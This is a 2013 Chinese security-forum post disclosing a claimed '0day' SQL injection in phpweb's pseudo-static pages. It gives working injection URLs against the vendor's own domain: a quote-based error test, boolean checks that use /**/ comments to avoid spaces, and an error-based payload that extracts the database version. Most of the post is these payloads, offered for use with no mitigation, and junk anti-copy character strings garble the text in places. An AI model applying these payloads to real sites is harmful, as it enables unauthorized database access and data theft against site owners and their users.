找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2391|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入
' r/ q0 @; S. t% O" x3 s2 B- I
. `5 j/ s" I, k% |主站:http://phpweb.net/
" \. K8 \  W" @0 Q$ S加’检测:6 o8 s2 v/ b' l1 \+ `* |' ^$ t) r

4 B" ?3 Z" P9 C/ O. ~( J/ M! Uhttp://www.phpweb.net/down/html/?772′.html
7 P' p% H$ d" F: O( ?7 O7 X ( B9 l7 h7 U+ ^( ~$ H3 \* _
出错
! O7 {7 f- r# y存在注入。
! T! O# Z& D# V2 a# u. t, j不能用空格,只能用/*罗
4 d/ O7 k) G, ]7 x1 Y9 b" Ohttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常9 Q+ Z& G3 f6 K# F* ~3 d) A3 H

* C* x  E' C* o/ S% j! Vhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.9 y2 @, ?+ V, Y- U" h' [
爆数据库版本:
0 h" T/ X" _' f. e+ f- v' h- r 9 y/ p% {; s; m3 f" Z
?/ t& ~% L7 c& {9 E, }" z( J# W7 o
1: [% \9 |( b5 M! U8 d, a& |+ v; c" K
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
! a/ c' _" `2 o; M更新日期: 2013-01-03 13:39:50        
  F% v$ y  P+ J0 v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表